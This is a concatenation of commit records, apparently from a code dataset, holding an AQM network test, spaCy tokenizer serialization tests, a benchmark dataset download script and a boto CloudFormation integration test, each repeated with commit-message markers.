operations = [
migrations.RunPython(fix_has_link,
reverse_code=migrations.RunPython.noop),
]
|
|
91133ca23b6fb2ad1fc888742ea78be0f849290e
|
henrste/test-simple.py
|
henrste/test-simple.py
|
#!/usr/bin/env python3
from framework.test_framework import Testbed, TestEnv, require_on_aqm_node
from framework.test_utils import *
def test_simple():
def my_test(testcase):
testcase.run_greedy(node='a', tag='node-a')
testcase.run_greedy(node='b', tag='node-b')
testbed = Testbed()
testbed.ta_samples = 10
testbed.ta_idle = 2
testbed.ta_delay = 500
testbed.cc('a', 'cubic', testbed.ECN_ALLOW)
testbed.cc('b', 'dctcp-drop', testbed.ECN_INITIATE)
run_test(
folder='results/simple',
title='Just a simple test to verify setup',
testenv=TestEnv(testbed),
steps=(
branch_sched([
('pi2',
'PI2: dualq target 15ms tupdate 15ms alpha 5 beta 50 sojourn k 2 t\\\\_shift 30ms l\\\\_drop 100',
lambda testbed: testbed.aqm_pi2(params='dualq target 15ms tupdate 15ms alpha 5 beta 50 sojourn k 2 t_shift 30ms l_drop 100')),
('pie', 'PIE', lambda testbed: testbed.aqm_pie('ecn target 15ms tupdate 15ms alpha 1 beta 10 ecndrop 25')),
#('pfifo', 'pfifo', lambda testbed: testbed.aqm_pfifo()),
]),
branch_rtt([10, 50, 100], title='%d'),
plot_swap(),
branch_runif([
('iftest-1', lambda testenv: True, 'if test 1'),
('iftest-2', lambda testenv: True, 'if test 2'),
]),
plot_swap(),
branch_bitrate([100]),
plot_swap(-2),
plot_swap(-1),
branch_repeat(3),
#step_skipif(lambda testenv: True),
my_test,
)
)
if __name__ == '__main__':
require_on_aqm_node()
test_simple()
|
Add test for demonstrating new test utilities
|
Add test for demonstrating new test utilities
|
Python
|
mit
|
henrist/aqmt,henrist/aqmt,henrist/aqmt,henrist/aqmt
|
Add test for demonstrating new test utilities
|
#!/usr/bin/env python3
from framework.test_framework import Testbed, TestEnv, require_on_aqm_node
from framework.test_utils import *
def test_simple():
def my_test(testcase):
testcase.run_greedy(node='a', tag='node-a')
testcase.run_greedy(node='b', tag='node-b')
testbed = Testbed()
testbed.ta_samples = 10
testbed.ta_idle = 2
testbed.ta_delay = 500
testbed.cc('a', 'cubic', testbed.ECN_ALLOW)
testbed.cc('b', 'dctcp-drop', testbed.ECN_INITIATE)
run_test(
folder='results/simple',
title='Just a simple test to verify setup',
testenv=TestEnv(testbed),
steps=(
branch_sched([
('pi2',
'PI2: dualq target 15ms tupdate 15ms alpha 5 beta 50 sojourn k 2 t\\\\_shift 30ms l\\\\_drop 100',
lambda testbed: testbed.aqm_pi2(params='dualq target 15ms tupdate 15ms alpha 5 beta 50 sojourn k 2 t_shift 30ms l_drop 100')),
('pie', 'PIE', lambda testbed: testbed.aqm_pie('ecn target 15ms tupdate 15ms alpha 1 beta 10 ecndrop 25')),
#('pfifo', 'pfifo', lambda testbed: testbed.aqm_pfifo()),
]),
branch_rtt([10, 50, 100], title='%d'),
plot_swap(),
branch_runif([
('iftest-1', lambda testenv: True, 'if test 1'),
('iftest-2', lambda testenv: True, 'if test 2'),
]),
plot_swap(),
branch_bitrate([100]),
plot_swap(-2),
plot_swap(-1),
branch_repeat(3),
#step_skipif(lambda testenv: True),
my_test,
)
)
if __name__ == '__main__':
require_on_aqm_node()
test_simple()
|
<commit_before><commit_msg>Add test for demonstrating new test utilities<commit_after>
|
#!/usr/bin/env python3
from framework.test_framework import Testbed, TestEnv, require_on_aqm_node
from framework.test_utils import *
def test_simple():
def my_test(testcase):
testcase.run_greedy(node='a', tag='node-a')
testcase.run_greedy(node='b', tag='node-b')
testbed = Testbed()
testbed.ta_samples = 10
testbed.ta_idle = 2
testbed.ta_delay = 500
testbed.cc('a', 'cubic', testbed.ECN_ALLOW)
testbed.cc('b', 'dctcp-drop', testbed.ECN_INITIATE)
run_test(
folder='results/simple',
title='Just a simple test to verify setup',
testenv=TestEnv(testbed),
steps=(
branch_sched([
('pi2',
'PI2: dualq target 15ms tupdate 15ms alpha 5 beta 50 sojourn k 2 t\\\\_shift 30ms l\\\\_drop 100',
lambda testbed: testbed.aqm_pi2(params='dualq target 15ms tupdate 15ms alpha 5 beta 50 sojourn k 2 t_shift 30ms l_drop 100')),
('pie', 'PIE', lambda testbed: testbed.aqm_pie('ecn target 15ms tupdate 15ms alpha 1 beta 10 ecndrop 25')),
#('pfifo', 'pfifo', lambda testbed: testbed.aqm_pfifo()),
]),
branch_rtt([10, 50, 100], title='%d'),
plot_swap(),
branch_runif([
('iftest-1', lambda testenv: True, 'if test 1'),
('iftest-2', lambda testenv: True, 'if test 2'),
]),
plot_swap(),
branch_bitrate([100]),
plot_swap(-2),
plot_swap(-1),
branch_repeat(3),
#step_skipif(lambda testenv: True),
my_test,
)
)
if __name__ == '__main__':
require_on_aqm_node()
test_simple()
|
Add test for demonstrating new test utilities#!/usr/bin/env python3
from framework.test_framework import Testbed, TestEnv, require_on_aqm_node
from framework.test_utils import *
def test_simple():
def my_test(testcase):
testcase.run_greedy(node='a', tag='node-a')
testcase.run_greedy(node='b', tag='node-b')
testbed = Testbed()
testbed.ta_samples = 10
testbed.ta_idle = 2
testbed.ta_delay = 500
testbed.cc('a', 'cubic', testbed.ECN_ALLOW)
testbed.cc('b', 'dctcp-drop', testbed.ECN_INITIATE)
run_test(
folder='results/simple',
title='Just a simple test to verify setup',
testenv=TestEnv(testbed),
steps=(
branch_sched([
('pi2',
'PI2: dualq target 15ms tupdate 15ms alpha 5 beta 50 sojourn k 2 t\\\\_shift 30ms l\\\\_drop 100',
lambda testbed: testbed.aqm_pi2(params='dualq target 15ms tupdate 15ms alpha 5 beta 50 sojourn k 2 t_shift 30ms l_drop 100')),
('pie', 'PIE', lambda testbed: testbed.aqm_pie('ecn target 15ms tupdate 15ms alpha 1 beta 10 ecndrop 25')),
#('pfifo', 'pfifo', lambda testbed: testbed.aqm_pfifo()),
]),
branch_rtt([10, 50, 100], title='%d'),
plot_swap(),
branch_runif([
('iftest-1', lambda testenv: True, 'if test 1'),
('iftest-2', lambda testenv: True, 'if test 2'),
]),
plot_swap(),
branch_bitrate([100]),
plot_swap(-2),
plot_swap(-1),
branch_repeat(3),
#step_skipif(lambda testenv: True),
my_test,
)
)
if __name__ == '__main__':
require_on_aqm_node()
test_simple()
|
<commit_before><commit_msg>Add test for demonstrating new test utilities<commit_after>#!/usr/bin/env python3
from framework.test_framework import Testbed, TestEnv, require_on_aqm_node
from framework.test_utils import *
def test_simple():
def my_test(testcase):
testcase.run_greedy(node='a', tag='node-a')
testcase.run_greedy(node='b', tag='node-b')
testbed = Testbed()
testbed.ta_samples = 10
testbed.ta_idle = 2
testbed.ta_delay = 500
testbed.cc('a', 'cubic', testbed.ECN_ALLOW)
testbed.cc('b', 'dctcp-drop', testbed.ECN_INITIATE)
run_test(
folder='results/simple',
title='Just a simple test to verify setup',
testenv=TestEnv(testbed),
steps=(
branch_sched([
('pi2',
'PI2: dualq target 15ms tupdate 15ms alpha 5 beta 50 sojourn k 2 t\\\\_shift 30ms l\\\\_drop 100',
lambda testbed: testbed.aqm_pi2(params='dualq target 15ms tupdate 15ms alpha 5 beta 50 sojourn k 2 t_shift 30ms l_drop 100')),
('pie', 'PIE', lambda testbed: testbed.aqm_pie('ecn target 15ms tupdate 15ms alpha 1 beta 10 ecndrop 25')),
#('pfifo', 'pfifo', lambda testbed: testbed.aqm_pfifo()),
]),
branch_rtt([10, 50, 100], title='%d'),
plot_swap(),
branch_runif([
('iftest-1', lambda testenv: True, 'if test 1'),
('iftest-2', lambda testenv: True, 'if test 2'),
]),
plot_swap(),
branch_bitrate([100]),
plot_swap(-2),
plot_swap(-1),
branch_repeat(3),
#step_skipif(lambda testenv: True),
my_test,
)
)
if __name__ == '__main__':
require_on_aqm_node()
test_simple()
|
|
de974f7bef19dbddc046f07bb2a58b8afa3dba09
|
spacy/tests/serialize/test_serialize_tokenizer.py
|
spacy/tests/serialize/test_serialize_tokenizer.py
|
# coding: utf-8
from __future__ import unicode_literals
from ..util import make_tempdir
import pytest
@pytest.mark.parametrize('text', ["I can't do this"])
def test_serialize_tokenizer_roundtrip_bytes(en_tokenizer, text):
tokenizer_b = en_tokenizer.to_bytes()
new_tokenizer = en_tokenizer.from_bytes(tokenizer_b)
assert new_tokenizer.to_bytes() == tokenizer_b
doc1 = en_tokenizer(text)
doc2 = new_tokenizer(text)
assert [token.text for token in doc1] == [token.text for token in doc2]
def test_serialize_tokenizer_roundtrip_disk(en_tokenizer):
tokenizer = en_tokenizer
with make_tempdir() as d:
file_path = d / 'tokenizer'
tokenizer.to_disk(file_path)
tokenizer_d = en_tokenizer.from_disk(file_path)
assert tokenizer.to_bytes() == tokenizer_d.to_bytes()
|
Add serializer tests for tokenizer
|
Add serializer tests for tokenizer
|
Python
|
mit
|
recognai/spaCy,recognai/spaCy,spacy-io/spaCy,recognai/spaCy,aikramer2/spaCy,recognai/spaCy,explosion/spaCy,honnibal/spaCy,spacy-io/spaCy,honnibal/spaCy,spacy-io/spaCy,recognai/spaCy,explosion/spaCy,explosion/spaCy,explosion/spaCy,spacy-io/spaCy,explosion/spaCy,aikramer2/spaCy,explosion/spaCy,honnibal/spaCy,spacy-io/spaCy,spacy-io/spaCy,aikramer2/spaCy,recognai/spaCy,honnibal/spaCy,aikramer2/spaCy,aikramer2/spaCy,aikramer2/spaCy
|
Add serializer tests for tokenizer
|
# coding: utf-8
from __future__ import unicode_literals
from ..util import make_tempdir
import pytest
@pytest.mark.parametrize('text', ["I can't do this"])
def test_serialize_tokenizer_roundtrip_bytes(en_tokenizer, text):
tokenizer_b = en_tokenizer.to_bytes()
new_tokenizer = en_tokenizer.from_bytes(tokenizer_b)
assert new_tokenizer.to_bytes() == tokenizer_b
doc1 = en_tokenizer(text)
doc2 = new_tokenizer(text)
assert [token.text for token in doc1] == [token.text for token in doc2]
def test_serialize_tokenizer_roundtrip_disk(en_tokenizer):
tokenizer = en_tokenizer
with make_tempdir() as d:
file_path = d / 'tokenizer'
tokenizer.to_disk(file_path)
tokenizer_d = en_tokenizer.from_disk(file_path)
assert tokenizer.to_bytes() == tokenizer_d.to_bytes()
|
<commit_before><commit_msg>Add serializer tests for tokenizer<commit_after>
|
# coding: utf-8
from __future__ import unicode_literals
from ..util import make_tempdir
import pytest
@pytest.mark.parametrize('text', ["I can't do this"])
def test_serialize_tokenizer_roundtrip_bytes(en_tokenizer, text):
tokenizer_b = en_tokenizer.to_bytes()
new_tokenizer = en_tokenizer.from_bytes(tokenizer_b)
assert new_tokenizer.to_bytes() == tokenizer_b
doc1 = en_tokenizer(text)
doc2 = new_tokenizer(text)
assert [token.text for token in doc1] == [token.text for token in doc2]
def test_serialize_tokenizer_roundtrip_disk(en_tokenizer):
tokenizer = en_tokenizer
with make_tempdir() as d:
file_path = d / 'tokenizer'
tokenizer.to_disk(file_path)
tokenizer_d = en_tokenizer.from_disk(file_path)
assert tokenizer.to_bytes() == tokenizer_d.to_bytes()
|
Add serializer tests for tokenizer# coding: utf-8
from __future__ import unicode_literals
from ..util import make_tempdir
import pytest
@pytest.mark.parametrize('text', ["I can't do this"])
def test_serialize_tokenizer_roundtrip_bytes(en_tokenizer, text):
tokenizer_b = en_tokenizer.to_bytes()
new_tokenizer = en_tokenizer.from_bytes(tokenizer_b)
assert new_tokenizer.to_bytes() == tokenizer_b
doc1 = en_tokenizer(text)
doc2 = new_tokenizer(text)
assert [token.text for token in doc1] == [token.text for token in doc2]
def test_serialize_tokenizer_roundtrip_disk(en_tokenizer):
tokenizer = en_tokenizer
with make_tempdir() as d:
file_path = d / 'tokenizer'
tokenizer.to_disk(file_path)
tokenizer_d = en_tokenizer.from_disk(file_path)
assert tokenizer.to_bytes() == tokenizer_d.to_bytes()
|
<commit_before><commit_msg>Add serializer tests for tokenizer<commit_after># coding: utf-8
from __future__ import unicode_literals
from ..util import make_tempdir
import pytest
@pytest.mark.parametrize('text', ["I can't do this"])
def test_serialize_tokenizer_roundtrip_bytes(en_tokenizer, text):
tokenizer_b = en_tokenizer.to_bytes()
new_tokenizer = en_tokenizer.from_bytes(tokenizer_b)
assert new_tokenizer.to_bytes() == tokenizer_b
doc1 = en_tokenizer(text)
doc2 = new_tokenizer(text)
assert [token.text for token in doc1] == [token.text for token in doc2]
def test_serialize_tokenizer_roundtrip_disk(en_tokenizer):
tokenizer = en_tokenizer
with make_tempdir() as d:
file_path = d / 'tokenizer'
tokenizer.to_disk(file_path)
tokenizer_d = en_tokenizer.from_disk(file_path)
assert tokenizer.to_bytes() == tokenizer_d.to_bytes()
|
|
99aadd5f7cc486f59c4f92f4987f0261c21590ce
|
download_data.py
|
download_data.py
|
from __future__ import print_function
import os
print('Making sure that you have the necessary Python libraries installed...\n')
try:
import wget
except:
try:
import pip
except:
os.system('easy_install pip')
os.system('pip install wget')
print('')
import wget
print('Downloading the data sets...')
if not os.path.isdir('data'):
os.mkdir('data')
dataset_list = ['20newsgroups.csv.gz',
'GAMETES-easy-4x2-way_her-0.4_pop-1600_attribs-100_discrete.csv.gz',
'GAMETES-hard-4x2-way_her-0.1_pop-200_attribs-100_discrete.csv.gz',
'Hill_Valley_with_noise.csv.gz',
'Hill_Valley_without_noise.csv.gz',
'breast-cancer-wisconsin.csv.gz',
'car-evaluation.csv.gz',
'cifar-10.csv.gz',
'cifar-100-coarse.csv.gz',
'cifar-100-fine.csv.gz',
'ecoli.csv.gz',
'flags.csv.gz',
'glass.csv.gz',
'ionosphere.csv.gz',
'mnist.csv.gz',
'sat.csv.gz',
'spambase.csv.gz',
'svhn.csv.gz',
'wine-quality-red.csv.gz',
'wine-quality-white.csv.gz',
'wine-recognition.csv.gz',
'yeast.csv.gz']
try:
for dataset in dataset_list:
if not os.path.exists('data/{}'.format(dataset)):
url = 'http://www.randalolson.com/data/{}'.format(dataset)
print('\n\n' + url)
wget.download(url, out='data/')
print('')
except KeyboardInterrupt:
os.system('rm *.csv.gz*.tmp')
print('')
|
Remove data files, add download script
|
Remove data files, add download script
This directory will become incredibly bloated if we add all of the data
here. Furthermore, it is not possible to upload large data sets into
GitHub repos. Thus, we will instead provide a script to download all of
the data sets from an external server.
|
Python
|
mit
|
rhiever/sklearn-benchmarks
|
Remove data files, add download script
This directory will become incredibly bloated if we add all of the data
here. Furthermore, it is not possible to upload large data sets into
GitHub repos. Thus, we will instead provide a script to download all of
the data sets from an external server.
|
from __future__ import print_function
import os
print('Making sure that you have the necessary Python libraries installed...\n')
try:
import wget
except:
try:
import pip
except:
os.system('easy_install pip')
os.system('pip install wget')
print('')
import wget
print('Downloading the data sets...')
if not os.path.isdir('data'):
os.mkdir('data')
dataset_list = ['20newsgroups.csv.gz',
'GAMETES-easy-4x2-way_her-0.4_pop-1600_attribs-100_discrete.csv.gz',
'GAMETES-hard-4x2-way_her-0.1_pop-200_attribs-100_discrete.csv.gz',
'Hill_Valley_with_noise.csv.gz',
'Hill_Valley_without_noise.csv.gz',
'breast-cancer-wisconsin.csv.gz',
'car-evaluation.csv.gz',
'cifar-10.csv.gz',
'cifar-100-coarse.csv.gz',
'cifar-100-fine.csv.gz',
'ecoli.csv.gz',
'flags.csv.gz',
'glass.csv.gz',
'ionosphere.csv.gz',
'mnist.csv.gz',
'sat.csv.gz',
'spambase.csv.gz',
'svhn.csv.gz',
'wine-quality-red.csv.gz',
'wine-quality-white.csv.gz',
'wine-recognition.csv.gz',
'yeast.csv.gz']
try:
for dataset in dataset_list:
if not os.path.exists('data/{}'.format(dataset)):
url = 'http://www.randalolson.com/data/{}'.format(dataset)
print('\n\n' + url)
wget.download(url, out='data/')
print('')
except KeyboardInterrupt:
os.system('rm *.csv.gz*.tmp')
print('')
|
<commit_before><commit_msg>Remove data files, add download script
This directory will become incredibly bloated if we add all of the data
here. Furthermore, it is not possible to upload large data sets into
GitHub repos. Thus, we will instead provide a script to download all of
the data sets from an external server.<commit_after>
|
from __future__ import print_function
import os
print('Making sure that you have the necessary Python libraries installed...\n')
try:
import wget
except:
try:
import pip
except:
os.system('easy_install pip')
os.system('pip install wget')
print('')
import wget
print('Downloading the data sets...')
if not os.path.isdir('data'):
os.mkdir('data')
dataset_list = ['20newsgroups.csv.gz',
'GAMETES-easy-4x2-way_her-0.4_pop-1600_attribs-100_discrete.csv.gz',
'GAMETES-hard-4x2-way_her-0.1_pop-200_attribs-100_discrete.csv.gz',
'Hill_Valley_with_noise.csv.gz',
'Hill_Valley_without_noise.csv.gz',
'breast-cancer-wisconsin.csv.gz',
'car-evaluation.csv.gz',
'cifar-10.csv.gz',
'cifar-100-coarse.csv.gz',
'cifar-100-fine.csv.gz',
'ecoli.csv.gz',
'flags.csv.gz',
'glass.csv.gz',
'ionosphere.csv.gz',
'mnist.csv.gz',
'sat.csv.gz',
'spambase.csv.gz',
'svhn.csv.gz',
'wine-quality-red.csv.gz',
'wine-quality-white.csv.gz',
'wine-recognition.csv.gz',
'yeast.csv.gz']
try:
for dataset in dataset_list:
if not os.path.exists('data/{}'.format(dataset)):
url = 'http://www.randalolson.com/data/{}'.format(dataset)
print('\n\n' + url)
wget.download(url, out='data/')
print('')
except KeyboardInterrupt:
os.system('rm *.csv.gz*.tmp')
print('')
|
Remove data files, add download script
This directory will become incredibly bloated if we add all of the data
here. Furthermore, it is not possible to upload large data sets into
GitHub repos. Thus, we will instead provide a script to download all of
the data sets from an external server.from __future__ import print_function
import os
print('Making sure that you have the necessary Python libraries installed...\n')
try:
import wget
except:
try:
import pip
except:
os.system('easy_install pip')
os.system('pip install wget')
print('')
import wget
print('Downloading the data sets...')
if not os.path.isdir('data'):
os.mkdir('data')
dataset_list = ['20newsgroups.csv.gz',
'GAMETES-easy-4x2-way_her-0.4_pop-1600_attribs-100_discrete.csv.gz',
'GAMETES-hard-4x2-way_her-0.1_pop-200_attribs-100_discrete.csv.gz',
'Hill_Valley_with_noise.csv.gz',
'Hill_Valley_without_noise.csv.gz',
'breast-cancer-wisconsin.csv.gz',
'car-evaluation.csv.gz',
'cifar-10.csv.gz',
'cifar-100-coarse.csv.gz',
'cifar-100-fine.csv.gz',
'ecoli.csv.gz',
'flags.csv.gz',
'glass.csv.gz',
'ionosphere.csv.gz',
'mnist.csv.gz',
'sat.csv.gz',
'spambase.csv.gz',
'svhn.csv.gz',
'wine-quality-red.csv.gz',
'wine-quality-white.csv.gz',
'wine-recognition.csv.gz',
'yeast.csv.gz']
try:
for dataset in dataset_list:
if not os.path.exists('data/{}'.format(dataset)):
url = 'http://www.randalolson.com/data/{}'.format(dataset)
print('\n\n' + url)
wget.download(url, out='data/')
print('')
except KeyboardInterrupt:
os.system('rm *.csv.gz*.tmp')
print('')
|
<commit_before><commit_msg>Remove data files, add download script
This directory will become incredibly bloated if we add all of the data
here. Furthermore, it is not possible to upload large data sets into
GitHub repos. Thus, we will instead provide a script to download all of
the data sets from an external server.<commit_after>from __future__ import print_function
import os
print('Making sure that you have the necessary Python libraries installed...\n')
try:
import wget
except:
try:
import pip
except:
os.system('easy_install pip')
os.system('pip install wget')
print('')
import wget
print('Downloading the data sets...')
if not os.path.isdir('data'):
os.mkdir('data')
dataset_list = ['20newsgroups.csv.gz',
'GAMETES-easy-4x2-way_her-0.4_pop-1600_attribs-100_discrete.csv.gz',
'GAMETES-hard-4x2-way_her-0.1_pop-200_attribs-100_discrete.csv.gz',
'Hill_Valley_with_noise.csv.gz',
'Hill_Valley_without_noise.csv.gz',
'breast-cancer-wisconsin.csv.gz',
'car-evaluation.csv.gz',
'cifar-10.csv.gz',
'cifar-100-coarse.csv.gz',
'cifar-100-fine.csv.gz',
'ecoli.csv.gz',
'flags.csv.gz',
'glass.csv.gz',
'ionosphere.csv.gz',
'mnist.csv.gz',
'sat.csv.gz',
'spambase.csv.gz',
'svhn.csv.gz',
'wine-quality-red.csv.gz',
'wine-quality-white.csv.gz',
'wine-recognition.csv.gz',
'yeast.csv.gz']
try:
for dataset in dataset_list:
if not os.path.exists('data/{}'.format(dataset)):
url = 'http://www.randalolson.com/data/{}'.format(dataset)
print('\n\n' + url)
wget.download(url, out='data/')
print('')
except KeyboardInterrupt:
os.system('rm *.csv.gz*.tmp')
print('')
|
|
50586ffe08473e5c7dc11b51f9b20923900e4f1c
|
tests/integration/cloudformation/test_connection.py
|
tests/integration/cloudformation/test_connection.py
|
#!/usr/bin/env python
import time
import json
from tests.unit import unittest
from boto.cloudformation.connection import CloudFormationConnection
BASIC_EC2_TEMPLATE = {
"AWSTemplateFormatVersion": "2010-09-09",
"Description": "AWS CloudFormation Sample Template EC2InstanceSample",
"Parameters": {
},
"Mappings": {
"RegionMap": {
"us-east-1": {
"AMI": "ami-7f418316"
}
}
},
"Resources": {
"Ec2Instance": {
"Type": "AWS::EC2::Instance",
"Properties": {
"ImageId": {
"Fn::FindInMap": [
"RegionMap",
{
"Ref": "AWS::Region"
},
"AMI"
]
},
"UserData": {
"Fn::Base64": "a" * 15000
}
}
}
},
"Outputs": {
"InstanceId": {
"Description": "InstanceId of the newly created EC2 instance",
"Value": {
"Ref": "Ec2Instance"
}
},
"AZ": {
"Description": "Availability Zone of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"AvailabilityZone"
]
}
},
"PublicIP": {
"Description": "Public IP address of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PublicIp"
]
}
},
"PrivateIP": {
"Description": "Private IP address of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PrivateIp"
]
}
},
"PublicDNS": {
"Description": "Public DNSName of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PublicDnsName"
]
}
},
"PrivateDNS": {
"Description": "Private DNSName of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PrivateDnsName"
]
}
}
}
}
class TestCloudformationConnection(unittest.TestCase):
def setUp(self):
self.connection = CloudFormationConnection()
self.stack_name = 'testcfnstack' + str(int(time.time()))
def test_large_template_stack_size(self):
# See https://github.com/boto/boto/issues/1037
body = self.connection.create_stack(
self.stack_name,
template_body=json.dumps(BASIC_EC2_TEMPLATE))
self.addCleanup(self.connection.delete_stack, self.stack_name)
if __name__ == '__main__':
unittest.main()
|
Add failing integration test for sigv4 failure
|
Add failing integration test for sigv4 failure
This repros #1037.
|
Python
|
mit
|
jotes/boto,revmischa/boto,trademob/boto,shaunbrady/boto,awatts/boto,darjus-amzn/boto,alex/boto,jindongh/boto,zzzirk/boto,jameslegg/boto,campenberger/boto,nexusz99/boto,acourtney2015/boto,garnaat/boto,s0enke/boto,lra/boto,ocadotechnology/boto,pfhayes/boto,nikhilraog/boto,clouddocx/boto,ryansb/boto,ekalosak/boto,vijaylbais/boto,israelbenatar/boto,kouk/boto,disruptek/boto,tpodowd/boto,kouk/boto,FATruden/boto,ddzialak/boto,Asana/boto,dablak/boto,lochiiconnectivity/boto,weka-io/boto,nishigori/boto,dablak/boto,rjschwei/boto,khagler/boto,Timus1712/boto,stevenbrichards/boto,vishnugonela/boto,bleib1dj/boto,varunarya10/boto,alex/boto,ric03uec/boto,alfredodeza/boto,drbild/boto,SaranyaKarthikeyan/boto,cyclecomputing/boto,rjschwei/boto,ramitsurana/boto,appneta/boto,shipci/boto,appneta/boto,jamesls/boto,rayluo/boto,podhmo/boto,andresriancho/boto,serviceagility/boto,felix-d/boto,drbild/boto,dimdung/boto,Pretio/boto,lochiiconnectivity/boto,rosmo/boto,bryx-inc/boto,janslow/boto,zachmullen/boto,weebygames/boto,jamesls/boto,abridgett/boto,tpodowd/boto,TiVoMaker/boto,jameslegg/boto,j-carl/boto,disruptek/boto,elainexmas/boto,andresriancho/boto,yangchaogit/boto
|
Add failing integration test for sigv4 failure
This repros #1037.
|
#!/usr/bin/env python
import time
import json
from tests.unit import unittest
from boto.cloudformation.connection import CloudFormationConnection
BASIC_EC2_TEMPLATE = {
"AWSTemplateFormatVersion": "2010-09-09",
"Description": "AWS CloudFormation Sample Template EC2InstanceSample",
"Parameters": {
},
"Mappings": {
"RegionMap": {
"us-east-1": {
"AMI": "ami-7f418316"
}
}
},
"Resources": {
"Ec2Instance": {
"Type": "AWS::EC2::Instance",
"Properties": {
"ImageId": {
"Fn::FindInMap": [
"RegionMap",
{
"Ref": "AWS::Region"
},
"AMI"
]
},
"UserData": {
"Fn::Base64": "a" * 15000
}
}
}
},
"Outputs": {
"InstanceId": {
"Description": "InstanceId of the newly created EC2 instance",
"Value": {
"Ref": "Ec2Instance"
}
},
"AZ": {
"Description": "Availability Zone of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"AvailabilityZone"
]
}
},
"PublicIP": {
"Description": "Public IP address of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PublicIp"
]
}
},
"PrivateIP": {
"Description": "Private IP address of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PrivateIp"
]
}
},
"PublicDNS": {
"Description": "Public DNSName of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PublicDnsName"
]
}
},
"PrivateDNS": {
"Description": "Private DNSName of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PrivateDnsName"
]
}
}
}
}
class TestCloudformationConnection(unittest.TestCase):
def setUp(self):
self.connection = CloudFormationConnection()
self.stack_name = 'testcfnstack' + str(int(time.time()))
def test_large_template_stack_size(self):
# See https://github.com/boto/boto/issues/1037
body = self.connection.create_stack(
self.stack_name,
template_body=json.dumps(BASIC_EC2_TEMPLATE))
self.addCleanup(self.connection.delete_stack, self.stack_name)
if __name__ == '__main__':
unittest.main()
|
<commit_before><commit_msg>Add failing integration test for sigv4 failure
This repros #1037.<commit_after>
|
#!/usr/bin/env python
import time
import json
from tests.unit import unittest
from boto.cloudformation.connection import CloudFormationConnection
BASIC_EC2_TEMPLATE = {
"AWSTemplateFormatVersion": "2010-09-09",
"Description": "AWS CloudFormation Sample Template EC2InstanceSample",
"Parameters": {
},
"Mappings": {
"RegionMap": {
"us-east-1": {
"AMI": "ami-7f418316"
}
}
},
"Resources": {
"Ec2Instance": {
"Type": "AWS::EC2::Instance",
"Properties": {
"ImageId": {
"Fn::FindInMap": [
"RegionMap",
{
"Ref": "AWS::Region"
},
"AMI"
]
},
"UserData": {
"Fn::Base64": "a" * 15000
}
}
}
},
"Outputs": {
"InstanceId": {
"Description": "InstanceId of the newly created EC2 instance",
"Value": {
"Ref": "Ec2Instance"
}
},
"AZ": {
"Description": "Availability Zone of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"AvailabilityZone"
]
}
},
"PublicIP": {
"Description": "Public IP address of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PublicIp"
]
}
},
"PrivateIP": {
"Description": "Private IP address of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PrivateIp"
]
}
},
"PublicDNS": {
"Description": "Public DNSName of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PublicDnsName"
]
}
},
"PrivateDNS": {
"Description": "Private DNSName of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PrivateDnsName"
]
}
}
}
}
class TestCloudformationConnection(unittest.TestCase):
def setUp(self):
self.connection = CloudFormationConnection()
self.stack_name = 'testcfnstack' + str(int(time.time()))
def test_large_template_stack_size(self):
# See https://github.com/boto/boto/issues/1037
body = self.connection.create_stack(
self.stack_name,
template_body=json.dumps(BASIC_EC2_TEMPLATE))
self.addCleanup(self.connection.delete_stack, self.stack_name)
if __name__ == '__main__':
unittest.main()
|
Add failing integration test for sigv4 failure
This repros #1037.#!/usr/bin/env python
import time
import json
from tests.unit import unittest
from boto.cloudformation.connection import CloudFormationConnection
BASIC_EC2_TEMPLATE = {
"AWSTemplateFormatVersion": "2010-09-09",
"Description": "AWS CloudFormation Sample Template EC2InstanceSample",
"Parameters": {
},
"Mappings": {
"RegionMap": {
"us-east-1": {
"AMI": "ami-7f418316"
}
}
},
"Resources": {
"Ec2Instance": {
"Type": "AWS::EC2::Instance",
"Properties": {
"ImageId": {
"Fn::FindInMap": [
"RegionMap",
{
"Ref": "AWS::Region"
},
"AMI"
]
},
"UserData": {
"Fn::Base64": "a" * 15000
}
}
}
},
"Outputs": {
"InstanceId": {
"Description": "InstanceId of the newly created EC2 instance",
"Value": {
"Ref": "Ec2Instance"
}
},
"AZ": {
"Description": "Availability Zone of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"AvailabilityZone"
]
}
},
"PublicIP": {
"Description": "Public IP address of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PublicIp"
]
}
},
"PrivateIP": {
"Description": "Private IP address of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PrivateIp"
]
}
},
"PublicDNS": {
"Description": "Public DNSName of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PublicDnsName"
]
}
},
"PrivateDNS": {
"Description": "Private DNSName of the newly created EC2 instance",
"Value": {
"Fn::GetAtt": [
"Ec2Instance",
"PrivateDnsName"
]
}
}
}
}
class TestCloudformationConnection(unittest.TestCase):
def setUp(self):
self.connection = CloudFormationConnection()
self.stack_name = 'testcfnstack' + str(int(time.time()))
def test_large_template_stack_size(self):
# See https://github.com/boto/boto/issues/1037
body = self.connection.create_stack(
self.stack_name,
template_body=json.dumps(BASIC_EC2_TEMPLATE))
self.addCleanup(self.connection.delete_stack, self.stack_name)
if __name__ == '__main__':
unittest.main()
|
<commit_before><commit_msg>Add failing integration test for sigv4 failure
